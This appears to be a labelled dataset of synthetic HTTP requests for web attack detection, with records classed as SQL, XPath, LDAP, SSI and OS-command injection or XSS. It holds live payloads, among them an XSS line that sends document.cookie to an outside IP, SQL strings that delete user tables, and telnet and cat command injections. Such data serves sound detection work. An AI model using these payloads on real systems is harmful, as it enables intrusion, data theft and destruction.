Start - Id: 49557
class: XPathInjection
GET /n61ohmgyo/daj6l_u_oHI99Olne/t4pa7poN/U5Gsystemstdin/VYe.-KG/vteineirhdflocnxd/c1r9srf4oi/cauFeeces/y@l2rN9KxlBUf/bpiclcrshgioanh9io/aaeluoAlOiaA1/ysoagosmeodao.cgi?eyjodlf=h8daues%27+or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or++%27cclneu%27+%3D++%27 HTTP/1.1
Host: www.ikgeeheafs.com
Connection: enNef
Accept: video/quicktime, image/png, video/mpeg;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: onnIDc-reaait, AEtith8-oG;q=0.5
Cache-Control: no-cache
Client-ip: 86.253.108.205
Cookie: 3eadcrsn7A=hA6vFNwyaIw;ise=1f
Cookie2: $Version="6"
Date: Sun, 31 May 09 08:26:06 UTC
ETag: "XzC6Z-Vy8j2n97GIJ"
Expect: 100-continue
From: petnihea@07eei4h.cz
If-Modified-Since: Wed, 14 Jan 04 04:23:02 GMT
If-Unmodified-Since: Tue, 14 Dec 04 11:11:29 CET
If-Match: "gSfVBjMCwIxcO2KBCV"
If-None-Match: "kEWDeLnT.B7v3YOoK"
If-Range: "Jzovszu6u9MAiD@_x2"
Max-Forwards: 756
MIME-Version: 0.7
Pragma: lste4pi=l
Proxy-Authorization: Digest username="93es"
Authorization: NTLM bGJlYjRsaW9kdHVjaW5iVG43YXJpZHRBb2xvc25hcjJvb2Vnem5zZWc=
Range: -044
Referer: http://www.adic.net/2sd6x/lan8/plsos/8msgi.jpg
TE: trailers,gzip;q=0.4,deflate;q=0.6
Trailer: If-Modified-Since
User-Agent: Mozilla/3.5 (compatible; MSIE 4.8; Unix; ehhcd8t; aeetenfrw)
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9192x115
Via: iiar/8.2 130.78.12.151:1, FTP/3.4 123.172.142.67
Transfer-Encoding: compress
Upgrade: 0ba/9.3, efdwri/1.0, tlso/8.2, tVzp/3.0
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5637590848505362302
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49557
Start - Id: 40283
class: SSI
GET /XWM/lsaeo/nk5-.nsf?ifehaeiiA=928146269&tab8=5365&hoc=0099&tnnzir8onents=4rls3ttl&xaEdlhczsiu=t0C6u1GnVS&4lhrheuaun=640&oIaegwIRngnchrd=1161&snsh9Ak3A=2&04jRFCf_=%3C%21--+%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5ClGsepe%5Ce2dno%5Cnriisol.exe+d%3A%5C6oqdls9%5Cwww.venege.org%5Cmssa1hd%5Cdatabase.mdb+++%2Fx+++exporttofoxpro%22--%3E HTTP/1.1
Host: www.tsViteetc.cz:1611
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.8, gzip
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 81.234.64.157
Cookie: .0N_yshutdownY_SR=sdLHqNAzkrYX;kiee=fntyoB0;hlrmIkcAii=enyhctcMhwinntCoda:ew;Kcoelgone=9191;wa8YES=11330624;kOStImtosu=264614
Cookie2: $Version="86"
Date: Sat, 07 Jun 08 23:59:40 CET
ETag: W/"OW87M.Z_H28iIF_"
Expect: ruppcio=vivhtthg;cwloss=woonmal
From: sinl@n3biht.ch
If-Modified-Since: Sat, 05 Jun 04 21:43:24 GMT
If-Unmodified-Since: Mon, 22 Oct 07 04:13:15 GMT
If-Match: *
If-None-Match: "ZptszONkLvdLgvg"
If-Range: Thu, 23 Dec 04 19:18:37 CET
Max-Forwards: 5339
MIME-Version: 9.5
Pragma: s9lyr=u
Proxy-Authorization: Tanare rhil=drTtinN
Authorization: Digest opaque="fzlzeHe2"
Range: 37574-,839789-
Referer: /l2aua/srffet/lerqEo/dild/cesb1.swf
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/7.4 (Windows; U; WinNT 1.4; xi-eb; rv:9.5.4) Gecko/14806927
UA-CPU: MIPS
UA-Disp: 7013,7944,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4714x687
Via: 4.1 www.te1aciqr.jpg:36661, 6.5 118.17.15.185:35, FTP/8.4 30.74.40.227:8409
Transfer-Encoding: identity
Upgrade: shUaoo/4.0, eat/0.9, y0aio/2.5, enluo/1.0, siaeN/8.6
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 147.185.144.226
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40283
Start - Id: 48273
class: XSS
POST /Zu1ttxU@.jsp? HTTP/1.1
Content-Length: 213
Content-Language: tinb,sl
Content-Encoding: identity
Content-Location: /e2iaiD/eswsmi/arAa.wav
Content-MD5: UzV1aVMzYzN0dWNoVHRpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 18 Jan 06 11:00:42 UTC
Last-Modified: Thu, 25 May 06 12:33:27 UTC
Host: www.w2we8Zt.biz:80
Connection: synt
Accept: video/quicktime;q=0.1, application/postscript, image/gif
Accept-Charset: utf-7, macintosh, iso-10646-ucs-2;q=0.1
Accept-Encoding: deflate;q=0.3, deflate
Accept-Language: tzilulw6-asn4R;q=0.2, Ixi8tr-pqs;q=0.6, tNlAslm-omnLe;q=0.3, sadif-ty;q=0.0
Cache-Control: no-transform
Client-ip: 4.38.79.185
Cookie: e18ob7l8o6im=7273506;he5=pVyRnLyH;iMyt3=processing-instructionhtyfsubsfac&ey;shrwkrrzh=<a    href=  "     about:<s&#99;ript  >[alert    ('e9w47eotV');]</script  >  "    >;6uihwotP=7896553
Cookie2: $Version="923"
Date: Thu, 01 Jul 04 08:15:55 UTC
ETag: W/"mbgq-B3kQSBMQQgn"
Expect: li6e0=ei63o0tf;l9gea=Jm5zu
If-Modified-Since: Wed, 08 Sep 04 01:41:17 UTC
If-Unmodified-Since: Sat, 01 Jul 06 15:04:36 GMT
If-Match: *
If-None-Match: "06Fx9pEgKPPJ3Q-tOQ.V"
If-Range: "tZn4R07mmhK7BKRTDfR"
Max-Forwards: 0
Pragma: no-cache
Proxy-Authorization: e8eeh mFinPerr=qMkohi0
Authorization: Basic b3Jlbnc6dGZkU2U=
Range: 44087-7032,84351-07
Referer: /hwhnXhni/attniddo/iau4ORai/htj7.tiff
TE: trailers,trailers
Trailer: Authorization
User-Agent: NnlsesbHy
UA-CPU: x86
UA-Color: color8
Via: HTTP/6.9 252.76.195.82
Transfer-Encoding: gzip
Upgrade: embo/8.5, uxtTs/2.4, seigc/8.0
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eaxjau=70883005&aoboesrt4niip=888742&tlvc6pade=onmednr6a9~a&d14nnaaheezSZ6u=]t]&icaieopj=88260987&nfsh=2340756&cCtunnpnamN=775&Rt9cycmdL=c4s&6oedo=casetmoocsris&hau49ehienCh=188824&BKXXE74cFqliframe=y=aPei

End - Id: 48273
Start - Id: 47786
class: XSS
GET /m7iEedaw1v.jpeg?dcpeoct=ftp2oe&qav4echoyLcJetc.=elpat&vKcmXNwAF_=rwLladUhrev4njix&eurrsndhy8elE6=6204184&btMs=fTtYadiana5T&ou=te&Urrmessiiso=488436009&Edb=%3DDaSz&AYboot.iniKpetcf=tCs%40d4&JXf0locationCSj=r%26%3Drcplinput+ld%7Evn&ygl=%3Cimg+src++%3D+++%22++nineetictr+++%22onmouseover+%3D++++%22++%5Bwindow.open%28%27http%3A%2F%2F72.119.121.103%2Fge.asmx%27%2Bdocument.cookie%29%3B%5D+++%22++++%3E&xRmteuvnaGpl=6310900400 HTTP/1.0
Host: 214.92.12.144
Connection: keep-alive
Accept: application/zip;q=0.8
Accept-Charset: windows-874, iso-8859-6, iso-8859-9, iso-8859-3, x-mac-turkish
Accept-Encoding: identity;q=0.6
Accept-Language: *;q=0.0
Cache-Control: max-stale=59498
Client-ip: 226.38.61.226
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="70"
Date: Tue, 27 May 08 20:41:11 CET
ETag: W/"5Ztigf4VNFI34Up"
Expect: tese=ojdN1;xeEsf
From: dRkiaeue@o6si.cz
If-Modified-Since: Thu, 19 May 05 02:03:23 CET
If-Unmodified-Since: Sat, 09 Apr 05 24:40:00 UTC
If-Match: "8rczmuoGye1S251ch"
If-None-Match: "58MJ1jIeIYKqDDZ5pe9"
If-Range: Fri, 09 May 08 03:24:48 GMT
Max-Forwards: 25
MIME-Version: 8.5
Pragma: itl9loht=bubk
Proxy-Authorization: Digest username="oaid"
Authorization: Basic dGlZaTZSejpldG80aG5w
Range: 9830-
Referer: /abeancs.htm
TE: chunked;q=0.0,deflate;q=0.1,trailers
Trailer: Accept-Language
User-Agent: snk1cwkofd/1.2.7.4.8
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7737x1025
Via: 0.0 www.nmgez.gif:89, 2.4 www.oech.gif, 7.5 72.89.150.186:778
Transfer-Encoding: onrchn; lsJnsa=0uy1oih
Upgrade: zbercb/3.5, lhe1/8.6, HsR/8.3, ne6enE/3.6
Warning: 264 239.66.183.33 "kes2a" 
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 14491
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47786
Start - Id: 37199
class: LdapInjection
GET /xomfilenee.exe?ht6rah=n6bu&ustznM3dece=495&krhj1Iaqtji=alljh&dgsW=pIwqD3&sresu=03765&vxmlmSPC-R3=%29++%28++%7C+++%28cn%3D*o++++%27brien*%29%28mail%3D*o+++%27brien*++++%29+&moeo=Dsk&yuebebbEnben=aFbZ.3QP&iuIxoe7y=xs1tt&vexec0WQVmHCopen=eRqgBSq3 HTTP/1.0
Host: www.NUtncayirl.de:3003
Connection: euio
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eei-nblc;q=0.9, 5ze-hfiic8s
Cache-Control: no-cache
Client-ip: 147.130.90.175
Cookie: nsinet55O=h5vcNheG
Cookie2: $Version="0"
Date: Sat, 08 Jul 06 20:15:12 UTC
ETag: "jWUARu-3c1x8dSRpo7"
Expect: 100-continue
From: oesr@teho3i.biz
If-Modified-Since: Thu, 12 Nov 09 19:39:18 GMT
If-Unmodified-Since: Wed, 08 Feb 06 12:50:40 CET
If-Match: "UKV5qTybQXfzRvhAF_"
If-None-Match: *
If-Range: Fri, 14 Mar 08 03:49:42 UTC
Max-Forwards: 6021
MIME-Version: 2.5
Pragma: GARtr=iQwat
Proxy-Authorization: VeVred yOevl=nQeapl7w
Authorization: NTLM NGluaWhlcFh5d3JIc2xicWxmZWFldFNlb3RsYW95dWFlZkVpZQ==
Range: 605-286224
Referer: /Bnepxt.gz
TE: gzip;q=0.6
Trailer: From
User-Agent: Mozilla/0.9 (Machintosh; U; Mac OS X 9.0; an-6a; rv:7.2.2) Gecko/02692929
UA-CPU: Sparc
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0874x8291
Via: HTTP/4.4 www.hzriwNle.jpg
Transfer-Encoding: deflate
Upgrade: resPct/8.2
Warning: 861 www.yirfos.jpg "e6bssmnatemnd" "Mon, 24 Nov 08 01:28:57 CET"
X-Forwarded-For: 209.47.70.154
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37199
Start - Id: 41723
class: SqlInjection
GET /n7DdoOa4Zi-@/echgzK0T3/s8Q.AjcZT4NV/Tko/euxoethth2Si/fyAdcese2aooa9cyNu/pp16lc/rinlcdi/eahTssanedlsdrlirdr/dfwGi35LoXZVy.html?ewen=ootl%27++++%29%3B+++++DELETE++++FROM+++users+WHERE++upper%28username%29+++%3D++upper%28+%27admin&yrsncd=%5Bo-scripta HTTP/1.0
Host: 6.171.86.181
Connection: ieaTnqx
Accept: */*
Accept-Charset: us-ascii;q=0.1, windows-1252
Accept-Encoding: *
Accept-Language: AOedlm-sa;q=0.4
Cache-Control: min-fresh=61771
Client-ip: 218.218.195.34
Cookie: StonatoiU=8160980;tlim=ecmdtes7;oEo4l0=ht;mwn=153531671;eoiaL8ca=ad95mQLzeDnF
Cookie2: $Version="483"
Date: Tue, 21 Aug 07 04:30:00 CET
ETag: W/"mBchHL7aQtkPkmSctxou"
Expect: 100-continue
From: 0RBmShi@t0btiu.st
If-Modified-Since: Fri, 21 Jul 06 20:14:12 UTC
If-Unmodified-Since: Wed, 31 Aug 05 01:06:24 CET
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: *
Max-Forwards: 7004
MIME-Version: 9.0
Pragma: en=3
Proxy-Authorization: Basic cnF5cmFkbWk6N2kzM2Q=
Authorization: Basic c2djeTpldWZpbA==
Range: -08
Referer: http://www.PhEa3.net/g2rihT/6liu8OOm.sh
TE: trailers,chunked;q=0.8
Trailer: Via
User-Agent: Mozilla/1.8 (Machintosh; U; PPC Mac OS X 3.2; pO-oS; rv:0.7.5) Gecko/30794517
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 431x0868
Via: 0.1 www.Rdwt.tiff:02, if64e/2.6 www.0sAkeTSs.html
Transfer-Encoding: compress
Upgrade: aah/4.0
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41723
Start - Id: 36637
class: OsCommanding
GET /bin/swOneen.pl/seite=;cat eshop.pl|? HTTP/1.1
Host: www.5iandt2biy.biz:7149
Connection: keep-alive
Accept: text/html
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: dqdiem4p-fsuAm, te-agietW;q=0.9, salc4Ogc-aeOhH
Cache-Control: max-age=4
Cookie: ndhpl1snthiiQp=7;leEd=gxp_tr $foooh slnetcrmCe;eawsnHacaRria=173529427;17sswut=eT04Uyyks;hfseenI=77777982;tsrnfts=psc e 
Cookie2: $Version="74"
Date: Wed, 08 Nov 06 24:24:37 CET
ETag: W/"Uz@kS7@BDhdUUqlE@y."
If-Modified-Since: Mon, 11 Feb 08 21:11:40 GMT
If-Unmodified-Since: Sat, 02 Feb 08 04:58:33 GMT
Max-Forwards: 6928
Referer: /aswg/asrihoo7/iznpits/sHeetw/ateb.cfm
TE: chunked,trailers,deflate;q=0.5
User-Agent: Mozilla/9.2 (compatible; Konqueror/8.5; Linux i586; ozada2ot)
Via: rcse/6.0 www.iins7on.htm

null

End - Id: 36637
Start - Id: 42261
class: SqlInjection
GET /th1/asn76es/rszhteinnbh.htm?zedebqeo=OR++++%27s3ho%27++++BETWEEN+++++%27R%27+AND++%27T%27 HTTP/1.0
Host: www.8feAhOsi.com
Connection: swreyex5
Accept: audio/*;q=0.7
Accept-Charset: utf-7;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: max-stale=5115
Client-ip: 164.216.181.230
Cookie: intf=am.i_vv;aoinlyr4=55;brh=n\3~;tgi=540155;nslr=t20D.oF
Cookie2: $Version="528"
Date: Tue, 01 Jul 08 23:48:12 UTC
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: eethwr@T5iivnsieh.be
If-Modified-Since: Tue, 10 Apr 07 07:54:03 CET
If-Unmodified-Since: Thu, 04 Feb 10 13:53:38 UTC
If-Match: "lxlWcYMj7Y3KNOJ7c"
If-None-Match: "7sQpvDzf-HF7pA5dBkn"
If-Range: "8mntve7@6eNZF0Jt1v"
Max-Forwards: 5
MIME-Version: 6.9
Pragma: ds=si4
Proxy-Authorization: Digest opaque="7ytlNcaS"
Authorization: Digest qop=auth
Range: 041331-40746,8485-207,-9
Referer: /oaotRl/vwot.pl
TE: chunked,gzip;q=0.0
Trailer: Range
User-Agent: qtvr3L.E http://www.oldfkji3.fr
UA-CPU: Sparc
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4325x083
Via: FTP/6.4 www.igE3o.jpg, FTP/2.4 www.ntofiesl.jpg, 3.7 39.50.87.22
Transfer-Encoding: hlwlr
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 050 47.45.71.159 "xvo7fEn2eRnq" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42261
Start - Id: 41595
class: SqlInjection
GET /ooams3oburn4n1Datnlz/4Kox@LLSuqvZoDyi/eJSs.CKjLaUfs/AaeaoTnoffdEer/etiypAEnrtm/x6nullFscriptu/nrvferegeoiuE4ht/ef4netedeuMAtsY/r7-@YQRkpUmzru/naopNvL@S/o_HOU/YHYMWYGg-Rvz8iR.mspx?3iM.NuWW=%27+++%29%3B+delete+from+++users%3B+++commit%3B++dummy%28+%27&swsHem9gexe=98 HTTP/1.0
Host: www.qqqenqhto.biz:395
Connection: keep-alive
Accept: image/*;q=0.5, text/*;q=0.1, video/*;q=0.6
Accept-Charset: cp-950;q=0.4, iso-8859-8-i, windows-1258;q=0.4, iso-2022-jp
Accept-Encoding: *;q=0.5
Accept-Language: supnHiuh-aa, iRi0t-cu, ubo7v8-tnayy, fnesSeho-iM
Cache-Control: no-cache
Client-ip: 70.60.65.162
Cookie: cibo=jbY9;wlcopyzexecTUN62rz=euFdR76k;8dnuee=eneo;aN1Nlhi=763
Cookie2: $Version="973"
Date: Mon, 20 Dec 04 08:08:27 CET
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: eqidtzo
From: mainn@tiee.st
If-Modified-Since: Mon, 23 Mar 09 17:01:17 CET
If-Unmodified-Since: Tue, 25 Nov 08 07:27:59 GMT
If-Match: *
If-None-Match: "H3z-6TTwNx-g5OH"
If-Range: Wed, 27 Dec 06 13:44:20 CET
Max-Forwards: 5228
MIME-Version: 3.6
Pragma: 4nehtl='esde8RFd'
Proxy-Authorization: Digest nc=d0D8Cc0E
Authorization: Basic MGNvaTpsYnloRGxtcw==
Range: 7594-
Referer: http://www.dbiq9ueb.cz/ertdr.pl
TE: trailers,trailers,chunked
Trailer: If-Range
User-Agent: Mozilla/3.8 (compatible; MSIE 6.9; Mac OS X; jmaf5etp; zcleylW)
UA-CPU: StrongARM
UA-Disp: 8644,7671,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 1.2 110.10.137.212, 1.1 87.34.212.183
Transfer-Encoding: identity
Upgrade: nmx/9.3, ydSwut/0.9
Warning: 546 www.haslz.jpeg "O9dygy07fAaes" "Tue, 03 Jan 06 08:40:36 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41595
Start - Id: 43057
class: OsCommanding
POST /gIavC.VU6PpZOC3PqfEi/thfJLfnV/y3/kasnn1itreirrtaey/des5osRiaj.tiff? HTTP/1.1
Content-Length: 262
Content-Language: 7wpMcfa,eCaW,pef9eii
Content-Encoding: compress
Content-Location: /kratr/escusdis.conf
Content-MD5: djN0ZWhzZGVlZ3JzdXJ1aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 Feb 07 12:20:49 UTC
Last-Modified: Sat, 08 Jul 06 24:33:46 GMT
Host: 200.152.134.21
Connection: keep-alive
Accept: application/*;q=0.4, application/*, application/*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: 2ewVuo4w-ntftce;q=0.6, 5q-jtdd;q=0.0, h-eet
Cache-Control: min-fresh=5
Client-ip: 106.223.101.99
Cookie: e6oyoKAnw2c=it5nshutdown=oM;qiLTyKfNaZkI=420907
Cookie2: $Version="6"
Date: Sun, 14 Feb 10 20:05:21 UTC
ETag: "CkQ3nAB.xUzhBzs5jox_"
Expect: 100-continue
From: oaHns@cadrMc1.ch
If-Modified-Since: Wed, 02 Nov 05 16:43:46 CET
If-Unmodified-Since: Sun, 28 Jun 09 02:18:18 UTC
If-Match: "QL1Ivc@iqjP4N6rHlA8"
If-None-Match: *
If-Range: Fri, 07 Apr 06 12:26:30 CET
Max-Forwards: 45
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: NTLM NDVQeXNkaEh1OHNvdGttZTlpdnFhbW5pb25yamFueElvZmF0VXRvZGU0
Range: -324,1-544,8-732
Referer: http://www.eesdhus.net/elHptt/ti7ehel/h6hh/getu.mdb
TE: deflate
Trailer: Accept
User-Agent: Mozilla/5.8 (Windows; U; Win98 8.7; iU-tu; rv:9.1.3) Gecko/29636681
UA-CPU: 68000
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 7.8 www.Ttio1g.htm, FTP/1.2 www.T3ranl6r.css
Transfer-Encoding: deflate
Upgrade: tun3o/7.3, omna/4.0
Warning: 822 www.eio8o.jpg "ftuhtoaegstt66xnrce" "Tue, 28 Jul 09 22:26:56 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 13504238814
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ebeR0hn0mogd=](0Edgdii1eius    l&nt=743&vxp=tol&lnuheqtn0t4=eEpulztlroi>&y9EbbodymH=07668&tp=eeosueAlsesekc7r&hoeh="   ;  telnet  6.166.38.59  80  ;&atnLkht=~8doseits7 -t&eiro=yhBd1&nteoar4egpsntc=SieS%&hgtlla=asnodewfewejeap&enacruhunrnshie=lses

End - Id: 43057
Start - Id: 49932
class: XPathInjection
GET /hNAh/iPNEWMDm3.js?ig3t=hndQ0a36e&isgtrtsiaob=sIlRA.C9&0oNalaiators=spE%2FhvarhavingI%27h-&joC1i=hcopy%3B&fd42akndeh=s83%27++++or+dinon%2Fz%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D1%5D+++or+%27iuei%27+++%3D++++%27&eAe=nbrHinnmMezeen5cs&eTrime=8perle4t%3Euah&c9h=%40er%40e&seeee6lx=4e&tef7=tsod+ol HTTP/1.1
Host: www.eaOn.cz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: soowro-lI3orao, fss-epsec;q=0.7, ai-iTE7dnw;q=0.7, setqms6-tg5tXn;q=0.9
Cache-Control: max-stale=9
Client-ip: 69.149.110.120
Cookie: antrsmdcg=E'8>au3Otiutenl;t.V5I7=connect$e gJuMs;zrsnfeonntf=df1zs;0QjGFO=Ed\d;nrCprrld=V7Nifgr7i
Cookie2: $Version="5"
Date: Wed, 02 Jun 04 02:40:54 GMT
ETag: "YiD1yiKB-oEJfWH8LaA"
Expect: 100-continue
From: cbithw@teurCy.cz
If-Modified-Since: Tue, 20 Jan 09 05:31:29 GMT
If-Unmodified-Since: Sat, 03 Jan 09 17:25:51 GMT
If-Match: "q5_ICix7eYhOlHmU7j"
If-None-Match: "muZqlDxp0r9@lt5VLUp"
If-Range: "4KYOb3buFFlZc4Y"
Max-Forwards: 8
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic bmJ2ZWFpcjpoZWk0cmhhVA==
Authorization: NTLM Mml0b25saWRvUWx1b2ppYWxMaGVlbGNvcmVyYm9jcjdudGZ5andtcnVyb29k
Range: 53346-
Referer: /hTit4hB/srmnlv.zip
TE: trailers,trailers
Trailer: User-Agent
User-Agent: jiiim4e5is (aIntyp; eGN3Cx-M; hVQ4hIp)
UA-CPU: x86
UA-Disp: 3308,0110,8
UA-OS: Solaris
UA-Pixels: 299x2707
Via: 0.5 www.uDretah4.css:36993, 1.1 www.45Taltn.jpeg:00787
Transfer-Encoding: gzip
Upgrade: b8rtI/0.8, eiste/5.5, i6ph/1.1
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49932
Start - Id: 37424
class: LdapInjection
GET /nD/h-S9hc/wkbEi_/rBQDkEqw/8lbbiwnp4rnlwh3hL48z/idM6fodd0mepMfdhCEua/egZbinnph-stdin3vqkxJP/tGeiawiaNltterliyx/g@k/er8tyr.bin?9nyQdm36oe4yt=532&cuoseitHejkat=4D83gThptxoce&on=rFQU&waarwrz=Rsaae+oS&eetcso1c0=18426&rsAeTacnu=Xnt%5C8&awshtao8tcIn=69048591&DNPIRF=lshs4tia%5C+oobjecteua9t0i+&ecncyo=wK2Mp1UU&lnnoy5aa=CiFnhtihy04no HTTP/1.0
Host: 233.62.45.216
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: n-tk;q=0.1
Cache-Control: ra6Amehq='le1anEd'
Client-ip: 95.170.99.54
Cookie: epodsotOh=z0P9rvRaTmR;tLwaGJ=95)(&(objectClass=3Cyh)(|(sn  =  he)(cn=a J*));drxaqoah=2e]dvo+ysadminm n6ns;ds2FRaoWdeho=2743;iSY2ihadee=11427683
Cookie2: $Version="22"
Date: Tue, 27 May 08 24:54:41 GMT
ETag: "PJuCbH0kU2Y@r1ru2kN3"
Expect: 100-continue
From: hies@394a.com
If-Modified-Since: Thu, 07 Feb 08 22:48:07 CET
If-Unmodified-Since: Sat, 01 Nov 08 06:16:29 GMT
If-Match: "8N9f36B6TdJuHZCMEx"
If-None-Match: "NiOUBukvT-PG@vPmw_Ib"
Max-Forwards: 9846
MIME-Version: 1.2
Authorization: Basic RXRidXQ6ZVJlaGV0aW8=
Range: -18725
Referer: http://td5l4iIr.net/hrhcte/nlrt6ia3/ha2Aante/md0N7o.zip
TE: trailers,chunked,trailers
Trailer: Authorization
User-Agent: eohERia/5.5.3.4
UA-CPU: 68000
UA-OS: Solaris
Via: ggeYnn/5.5 52.237.230.108, HTTP/9.0 79.122.155.35
Upgrade: suai/1.3
Warning: 008 218.230.175.115 "dtqhnnadomreeucsciof" 
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 37424
Start - Id: 49589
class: XPathInjection
GET /ho1tjMep6WRza3C/EtFP..aspx?tm2a=5918&tpnadeh2tdhaua=tmpeiSheSdibH&MUjQ2q@P=al&e7c=o5&fjeyIaa1sathsha=sigo&tle38=eeval&oainoEct=ltmp3Ee&48eb=275277616&PprWK=e6p2stlsPY1&e6nkirrEDivoe=iryL%2F1jpalx%2F5hylr%2Fchild%3A%3Anode%28%29%5B+position%28%29%3D2%5D+++%7C++++5%2FlaGu%2Fbeyntc%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D747%5D+++++or+++%27oeatme3s%27+%3D+++%27&Wkusld=nbl1qeElzhhaa&eArxwtee=3 HTTP/1.0
Host: 228.158.143.231:28779
Connection: ihkcbtf
Accept: image/*;q=0.8, application/*
Accept-Charset: euc-jp, gb2312;q=0.0, euc-jp;q=0.2
Accept-Encoding: compress;q=0.5, gzip
Accept-Language: SNe-g;q=0.2
Cache-Control: min-fresh=7
Client-ip: 173.161.30.244
Cookie: a3xeh=ttfroms?Na:ijp/;REetp=uia;hch56=19324202;C9openpspfbMESc=iesr7hypnaunionrexecu;u@PEmRlG2Za=262
Cookie2: $Version="81"
Date: Thu, 14 Apr 05 14:57:20 GMT
ETag: "P5HHX.8tz6s5kz9aYcf6"
Expect: 100-continue
From: rmya@typuTon9h.uk
If-Modified-Since: Fri, 21 Sep 07 10:04:53 GMT
If-Unmodified-Since: Fri, 03 Feb 06 01:01:40 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 17 Apr 08 09:13:02 GMT
Max-Forwards: 58
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: Basic dzljSGVpcTo3bHRl
Range: 124-314534,89-
Referer: http://muu4.cz/gWpll/tuebueo/snnel3o.cfm
TE: deflate;q=0.8,chunked;q=0.4
Trailer: Max-Forwards
User-Agent: Mozilla/5.1 (Windows; U; Windows NT 9.7; e2-ec; rv:3.0.8) Gecko/95821680
UA-CPU: Sparc
UA-Disp: 427,3177,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 122x540
Via: eeeMst/2.4 244.252.198.119, rmnb/7.1 www.oaENaF.gif, FTP/4.1 13.11.4.99:185
Transfer-Encoding: gzip
Upgrade: swferr/0.9, iaea/3.5, sehs/8.2
Warning: 639 196.49.192.5 "noannpLodeouf6r1" "Wed, 09 Nov 05 13:54:52 CET"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 49589
Start - Id: 36418
class: OsCommanding
